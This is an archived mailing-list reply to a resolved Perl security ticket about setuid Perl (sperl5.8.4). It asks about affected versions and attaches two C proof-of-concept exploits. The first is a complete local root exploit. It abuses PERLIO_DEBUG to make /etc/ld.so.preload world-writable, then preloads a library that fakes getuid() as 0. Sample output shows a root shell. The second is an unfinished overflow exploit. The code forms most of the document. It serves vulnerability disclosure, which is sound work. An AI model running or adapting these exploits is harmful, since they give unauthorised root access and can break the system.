Re: [perl #33990] [RESOLVED] setuid perl security issues

Mon, 31 Jan 2005 07:31:00 -0800

Much thanks on the quick response and fix.
Attached are the PoC for each condition incase you were wondering how exploitable this *was*.

Do you have any idea what the span of this bug is (like what versions are affected)? Will there be a new release or perl announcement about this bug(s)?

And finally, was this actually the buggy line of code for the overflow or was it elsewhere?

in perlio.c:

  if (dbg > 0) {
       dTHX;
#ifdef USE_ITHREADS
       /* Use fixed buffer as sv_catpvf etc. needs SVs */
       char buffer[1024];
       char *s;
       STRLEN len;
       s = CopFILE(PL_curcop);
       if (!s)
           s = "(none)";
       sprintf(buffer, "%s:%" IVdf " ", s, (IV) CopLINE(PL_curcop));


Thanks for your time.

-KF


According to our records, your request regarding "setuid perl security issues" has been resolved. 

If you have any further questions or concerns, please respond to this message.

For other topics, please create a new ticket.

Please don't feel obligated to say "Thanks" or "Kudos" or "I owe you a beer" -- 
if you respond to this message it will reopen the ticket. If you must, please send email directly to the 
person who handled your ticket, and not to the tracking system.

<URL: https://rt.perl.org/rt3/Ticket/Display.html?id=33990 >






/*
 * Copyright Kevin Finisterre 
 * 
 * ** DISCLAIMER ** I am in no way responsible for your stupidity.
 * ** DISCLAIMER ** I am in no way liable for any damages caused by compilation and or execution of this code.
 *
 * ** WARNING ** DO NOT RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***
 * ** WARNING ** overwriting /etc/ld.so.preload can severly fuck up your box (or someone elses).
 * ** WARNING ** have a boot disk ready incase some thing goes wrong.
 *
 * Setuid Perl exploit by KF - kf_lists[at]secnetops[dot]com - 1/30/05
 *
 * this exploits a vulnerability in the PERLIO_DEBUG functionality
 * tested against sperl5.8.4 on Debian
 *
 * [EMAIL PROTECTED]:~$ cc -o ex_perl ex_perl.c
 * [EMAIL PROTECTED]:~$ ls -al /etc/ld.so.preload
 * ls: /etc/ld.so.preload: No such file or directory
 * [EMAIL PROTECTED]:~$ ./ex_perl
 * sperl needs fd script
 * You should not call sperl directly; do you need to change a #! line
 * from sperl to perl?
 * [EMAIL PROTECTED]:~$ su -
 * jdam:~# id
 * uid=0(root) gid=0(root) groups=0(root)
 * jdam:~# rm /etc/ld.so.preload
 *
 */


#define PRELOAD "/etc/ld.so.preload"
#include <stdio.h>
#include <strings.h>

int main(int *argc, char **argv)
{

        FILE *getuid;
        if(!(getuid = fopen("/tmp/getuid.c","w+"))) {
                printf("error opening file\n");
                exit(1);
        }
        
	fprintf(getuid, "int getuid(){return 0;}\n" );
        fclose(getuid);

        system("cc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc");

	putenv("PERLIO_DEBUG="PRELOAD);
        umask(001); // I'm rw-rw-rw james bitch!
        system("/usr/bin/sperl5.8.4");
        FILE *ld_so_preload;

        char preload[] = {
                "/tmp/getuid.so\n"
        };

        if(!(ld_so_preload = fopen(PRELOAD,"w+"))) {
                printf("error opening file\n");
                exit(1);
        }
        fwrite(preload,sizeof(preload)-1,1,ld_so_preload);
        fclose(ld_so_preload);
}


/*
 * Copyright Kevin Finisterre
 *
 * Setuid perl PerlIO_Debug() overflow
 *
 * cc -o ex_perl2 ex_perl2.c -std=c99
 * 
 * Not complete yet...
 */

#include <stdlib.h>
#include <stdio.h>
#include <strings.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

int main(int *argc, char **argv)
{
 	int count = 5;
	char malpath[10000];
	char tmp[256];
	char *filler;
	chdir("/tmp/");

	filler = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/";
	
	for (int x=0; x<3; x=x+1)
	{
		mkdir(filler, 0777);
		chdir(filler);
		count = count + 256;		
	}

        memset(tmp,0x42,201);
	count = count + 201;
	strcat(tmp, "/");
	mkdir(tmp, 0777);
	chdir(tmp);

	printf ("Dirlen: %d\n", count); 

	FILE *perlsploit;
	char perldummyfile[] = {
                "#!/usr/bin/sperl5.8.4\n"
                "# \n"
                "# Be proud that perl(1) may proclaim: \n"
                "#   Setuid Perl scripts are safer than C programs ...\n"
                "# Do not abandon (deprecate) suidperl. Do not advocate C wrappers. \n"
        };

        if(!(perlsploit = fopen("take_me.pl","w+"))) {
                printf("error opening file\n");
                exit(1);
        }
        fwrite(perldummyfile,sizeof(perldummyfile)-1,1,perlsploit);
        fclose(perlsploit);

	getcwd(malpath, 10000);
	strcat(malpath, "/");
	strcat(malpath, "take_me.pl");
	printf("running: %s\n",malpath);

	chmod(malpath,0755);

	putenv("PERLIO_DEBUG=/tmp/ninjitsu");
	system(malpath);
}

Reply via email to